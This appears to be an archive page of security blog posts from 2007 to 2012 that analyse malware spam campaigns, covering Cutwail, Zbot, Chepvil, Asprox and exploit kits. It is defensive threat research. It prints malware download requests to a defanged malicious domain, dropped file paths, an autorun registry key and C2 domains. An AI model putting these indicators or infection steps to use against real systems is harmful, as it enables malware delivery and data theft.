Posts Tagged ‘Malware’

View All Spam

Cutwail Drives Spike in Malicious HTML Attachment Spam

By Rodel Mendrez  •  February 16th, 2012  •   Spam

Over the past month, we have observed several large spam campaigns with malicious HTML attachments. We believe the botnet behind these campaigns is Cutwail. Here is data we collected, starting from the first day of 2012, illustrating spikes of spam with malicious HTML attachments:

Attaching an HTML file to an email is a tactic we have seen used in phishing. But recently, attackers have spammed out large volumes of HTML attachments that include malicious JavaScript. Here is an example we received a few days ago:

In the image above, we opened message with the attached .HTM file using the Mozilla Thunderbird email client. Although Thunderbird rendered the HTML attachment, fortunately its default settings prevented the malicious JavaScript in the HTML source code from running. The Thunderbird user needs to click the attachment or open the HTML file in a browser for the JavaScript to run.

The image below is another example of a more recent spam campaign. This particular message claims to be an invoice from a random company where an .HTM file is attached pretending to be an invoice file. Here, the sample spam was opened using Microsoft Outlook and the attachment just shows the icon of the default browser of the system. Again, in order for the malicious JavaScript to execute, the user needs to click the attachment to fire up a browser.


So what happens if the unsuspecting user opens the HTML attachment? Here is the HTML source code:

The first half of the HTML code is the benign part. It provides the “You are redirecting…” text in the browser title bar and prints “Please wait… Loading….” in the browser – the cybercriminal perhaps just being courteous. The second and malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a webpage in the same browser window. But this is not an ordinary webpage; it contains code that attempts to exploit multiple vulnerabilities in the browser and its plugin. In our test machine, the landing page successfully exploited our browser’s default PDF reader with the Libtiff integer overflow in Adobe Reader vulnerability. The exploit ended up downloading and installing malware in our test computer, which at the time of writing, was a data-stealing Trojan with the antivirus detection name Cridex.

The landing page that contains the exploit code is a kit used by cybercriminals particularly for this spam campaign, the Phoenix Exploit kit. This exploit kit is readily available for cybercriminals to buy and use, all they need is their own webserver that can run PHP server scripts. The image shown below is the screenshot of the actual server’s “Phoenix Exploit’s Kit” admin page. The “—“ referrer in the statistics suggests that most visitors were NOT coming from another website but from the HTML files that the cybercriminals spammed out. It also shows over 4000 visitors, 15% of whom were successfully exploited.


Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future.

M86 MailMarshal customers are protected against these spam campaigns, and M86 Secure Web Gateway customers are protected against the Phoenix Exploit kit.

Thanks to Daniel Chechik for the additional analysis and insight on the Phoenix kit.

Tags:    |    |    |  

View All MalwareView All Spam

An analysis of the ACH spam campaign

By Rodel Mendrez  •  September 6th, 2011  •   Malware Spam

Recently, we have seen a resurgence of malicious spam campaigns using an “ACH” theme. The Automated Clearing House (ACH) is an an electronic network for financial transactions in the United States overseen by NACHA. Last week, we came across a suspicious looking spam campaign with the unusual subject line “UAE Central Bank Warning: Email scam alert”. After closer investigation, we determined that it was indeed a fake ACH notification. The message contained an attached malicious file using the filename “”. As suspected, the malicious file attachment was a downloader that we have seen a lot of lately – Chepvil.

ACH spam campaign from the Donbot botnet


The Chepvil downloader, unsurprisingly, proceeded to retrieve more than just one piece of additional malware. First was the password stealing malware, Zbot, which was obtained from the domain name rattsillis[dot]com using a standard HTTP request, downloading the file “s.exe” – a Zbot variant.

GET /s.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Cache-Control: no-cache

The file “s.exe” is executed immediately after being downloaded and drops the following files in the infected system:

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Ahob\paygi.ujl.0 – encrypted configuration file

C:\Documents and Settings\{USER}\Application Data\Iqkohi\lady.exe – dropped copy of Zbot itself

C:\Documents and Settings\{USER}\Application Data\Microsoft\Address Book\Administrator.wab – an empty Windows address book.

Zbot then attempted to connect to a random generated domain to contact its command and control server.

The second piece of malware that Chepvil downloaded was a proxy-based spambot, an executable file “22.exe” from the same domain rattsillis[dot]com.

GET /22.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Cache-Control: no-cache 

The file “22.exe” was interesting because we had not encountered it before. It was detected by 22 out of 45 antivirus programs with various generic detection names, although some identified it as Trojan.Scar.eaml. Upon execution, the proxy spambot drops a copy of itself in the Windows TEMP folder as svchost.exe, with a file size of around 10kb.

C:\Documents and Settings\{user}\Local Settings\Temp\svchost.exe

It also drops another copy of itself in the Application Data folder using the filename format: KB{6 random number}.exe.

C:\Documents and Settings\{user}\Application Data\KB117188.exe

Then the malware adds an autorun registry key to ensure that it will survive on Windows start up.


KB117188.exe = “”C:\Documents and Settings\{user}\Application Data\KB117188.exe”"

After installation, the parent spambot process executes the file Svchost.exe it dropped in the Windows TEMP folder and exits itself.

Instead of listening to a specific port and waiting, the proxy spambot attempts to connect to a control server by performing a standard DNS A query to the domain name luis-vuitton-elite[dot]com. However if that fails, the bot attempts to connect to a randomly generated domain name.


The malware code that attempts to connect to the control server


Once connected, the proxy spambot initializes port 1001 where it sends and receives packets of data from the control server.

Exchange of data between the control server and the spambot


Meanwhile at port 1002, the spambot receives the actual spam data from the control server and relays this data to the final recipients. This simple proxy can relay spam at a rate of up to 1000 messages per hour.

Spam is received by the spambot from the control server and relayed to the recipients.


The command and control server’s IP address is based in Germany:

WHOIS information about the control server


This spambot’s recent spamming activities includes both pharmaceutical, and further ACH campaigns that appears to be from; and are very similar to the one which led to this infection in the first place.

Sample spam email from the Proxy-based spambot

In conclusion, there is not much that is new in this sequence of events. A spammed-out trojan downloader which triggers the execution of multiple pieces of malware on the host, including the obligatory data stealer, and a spambot to further propagate the nastiness. As we always say, there is no patch for social engineering and the best way to protect yourself is to be cautious.

Tags:    |    |    |    |    |    |  

View All Malware

Want to be friends on Facebook? Don’t click the link!

By Phil Hay  •  August 29th, 2011  •   Malware

Hot on the heels of last week’s malicious attachment spam, we are now observing another large malicious spam campaign – this time without attachments. Like the majority of last week’s campaigns, this spam is being sent out from the Cutwail botnet.

The message arrives as a fake Facebook friend invite notification. The message looks convincing, it appears the spammers have copied the actual Facebook template and substituted their own links.  However, there are clues it is fake.  The message doesn’t contain any profile photos, and they have omitted the recipient’s email address in the fine print at the bottom.


By contrast, here is a legitimate Facebook friend request.


Clicking the link fetches a web page that contains two ways you can infect yourself. First, there is a link pretending to be an Adobe Flash update where you can download and install malware manually. Second, there is a hidden iframe that loads data from a remote server hosting the Blackhole Exploit Kit, which attempts to automatically exploit vulnerabilites on your system, notably Java.



The malware that is downloaded appears to be a data stealer Zbot variant (Virus Total report here).

Impersonation of the big social networks’ email notifications is an increasingly common tactic of the spammers. Be wary out there, not everything is as it seems.


Tags:    |    |    |    |    |  

View All Spam

Massive Rise in Malicious Spam

By Rodel Mendrez  •  August 16th, 2011  •   Spam

In April this year, we reported on a spike in malicious spam. Yes, that was a significant increase but not as massive as we have observed this week. From the beginning of August, we have observed a huge surge of malicious spam which far exceeds anything we have seen over the past two years, including prior to the SpamIt takedown last October. The majority of the malicious spam comes from the Cutwail botnet, although Festi and Asprox are among the other contributors.


Last week malicious spam made up at least 13% of the total spam volume we received which is unusual. Yesterday that number spiked to 24%.

Spam by category as of last week

Four of the campaigns, which we identified as originating from the Cutwail botnet are mostly recycled spam themes – Fedex, credit card, changelogs and invoices. The malware is attached within a compressed ZIP archive and is a Trojan that downloads additional malware including Fake AV, SpyEye and the Cutwail spambot itself.


Fedex Spam Campaign

Credit Card Blocked

Credit Card Blocked spam campaign


Invoice spam campaign

Change Log

Change Log spam campaign


Meanwhile, Asprox is continuing to send out malicious hotel transaction spam. The attached malware in this spam campaign installs a password stealer and Fake AV.

Sample of malicious spam sent by Asprox


The Festi botnet has also joined the fray and is sending a malicious “UPS” campaign that distributes the Chepvil Trojan, a downloader that is also installing Fake AV.

UPS spam campaign sent by Festi

This is an epic amount of malicious spam. After multiple recent botnet takedowns, cyber criminal groups remain resilient, clearly looking to build their botnets and distribute more fake AV in the process. It seems spammers have returned from a holiday break and are enthusiastically back to work.

Tags:    |    |    |  

View All Spam

FedEx Spam Seeding New Asprox Binary

By Rodel Mendrez  •  August 28th, 2010  •   Spam

Over the past few days, the Asprox botnet has been spamming out a fake FedEx campaign. We noticed this after we saw our old Asprox binaries downloading a new updated  “196” version from the bot’s command and control server.

This Asprox update is responsible for spamming this week’s FedEx malicious spam campaign.

The attachment in this spam campaign is a downloader Trojan known by some AV products as Oficla or Sasfis. When run, the Trojan retrieves commands from its control server to download the Asprox spambot binary, that in turn, sends this FedEx spam campaign. Below is an graphical overview of this campaign.

Asprox spam campaigns come and go. A couple of months ago we blogged about a spam campaign where the Asprox binary also launched an SQL injection attack targeting ASP websites. A month after, it stopped and the command and control servers were inaccessible. Now it’s back again using the same C&C domain and seeding a new binary. Since the Asprox bot is capable of updating itself on the infected host, our concern is that the next update may launch another round of SQL injection attacks.  We will certainly be monitoring it closely.

Tags:    |    |    |    |    |  

View All MalwareView All Vulnerabilities

The impact of just 5 random letters…

By Anonymous  •  January 17th, 2008  •   Malware Vulnerabilities

We have been watching in amazement the impact our latest Malicious Page of the Month had on the industry and media.
From coverage at Fox Business News, and the Washington Post, all the way to the more “traditional” security outlets such as SecurityFocus, SC Magazine and bloggers such as Dancho Danchev.

The scary thing is the non-media related impact – we are still seeing a tremendous amount of domains (and sites) that are still compromised. Just a quick preview of the ongoing research we are putting into this – we are getting closer to getting to the root (no pun intended) cause of the problem that seems to affect Linux webservers (and this time it may not be a cPanel related issue for a change).

Looking forward to posting an update soon as we make progress in cracking this one.

Tags:    |    |    |  

View All CybercrimeView All Malware

And the winner for “top virus” of 2007 is…

By Anonymous  •  January 6th, 2008  •   Cybercrime Malware

Not a virus. Not even a malware. Neither is the runner up… It’s the method of how malware is populated.

According to a report, the most common malware attack in 2007 is the notorious IFRAME.

On our monthly and quarterly reports we provided more in-depth analysis of such top-ranking IFRAME and obfuscated code.
In Finjan’s terminology, the top-ranked virus IFRAME is not a malware or a virus, it’s more like how criminals are directing users’ browsers to a malware. Interestingly enough – the runner-up is “Mal/ObfJS” – Obfuscated javascript, again no a virus or malware but a simple technique to hide exploits from signature matching inspection.

How come? Well, remember that signature-based solutions are in a dire need to be able to stop the more common techniques employed by attackers (we have actually started to report on them during 2006), since the detection technology is limited in detecting the obfuscation and evasive techniques – typically signaturing the de-obfuscating portions of the script.

This has led to the recent reports of false-positives by multiple AV vendors lately, as active-content is becoming more and more complicated, and the ways to express an action in interpreted code are very complex – meaning that signatures in this realm are almost obsolete (you can see the honorary mention of the “DF” function (Mal/FunDF) in the 10th place, which is a signature on a specific de-obfuscating function – again, no mention of any malicious action taken by it, it’s just that it had it’s 15 minutes of fame when it was used by toolkits to deliver actual malicious code…)

Looking forward to 2008 I really hope that the industry as a whole will not be lagging behind the attack vectors as it did in 2007, and new and improved engines would enable end-users (especially consumers who do not benefit from the more sophisticated solutions offered to enterprises) to have better protection when using the internet.

I know what my new-year resolutions are – do you?

Posted by Iftach Amit

Tags:    |    |    |  

View All CybercrimeView All Malware

SMB Hosting

By Anonymous  •  December 4th, 2007  •   Cybercrime Malware

We have started seeing malware being hosted on more “legitimate” hosting sites that usually provide an easy SMB hosting for a low monthly fee.

One of the sites hosting the malware is: http://9[REMOVED]o(dot)org/ where a lot of executable are located as part of an infection vector:

As can be seen from the VirusTotal scan for one of the files we picked – these are all malicious executables (and pretty new as well – check out the detection rate…)

When looking at the site, it even out rightly states that it is being hosted in a prime hosting location – this is what I call a great reputation!!! It is clear that the attacker has placed the malicious code on a hosting solution (paid…) that would “legitimize” it so that it would appear to be benign.

This is just one example – keep your eye on upcoming MCRC publications in the coming month for a full analysis on Small Business Hosting, and reputation services used for security purposes…

To be continued…

Posted by Ayelet Heyman

Tags:    |    |  

View All CybercrimeView All MalwareView All Phishing

Malicious Advertisement (or The Ad that stole the Site)

By Anonymous  •  November 15th, 2007  •   Cybercrime Malware Phishing

Spyware Sucks published a post about a site hijacked by a malicious advertisement. Once loaded, this advertisement redirects the browser (through 3 other domains) to “”, a notorious fake anti-malware program.

Once redirected to the site, the browser window is minimized and a new window opens up, showing what seems to be a sophisticated online scan. This is, of course, more scaM than scaN enticing the user to download malicious software. Keeping in mind that this attack is not targeted against computer experts but against normal users, reveals its danger – the well formatted site shows a great graphic, misleading the user into thinking that his machine is infected. Furthermore, the site will continuously open windows asking the user to approve installation and won’t stop until you kill the browser, hoping the user will download the file in order to get rid of the annoying messages.

Another issue is the loss for the original site from which the ad was served. This could have been even more problematic if for instance the malicious advertisement was redirecting the browser to a phishing site mimicking the original site…

Site owners, choose your Ad provider wisely!

Posted by Golan Yosef

Tags:    |    |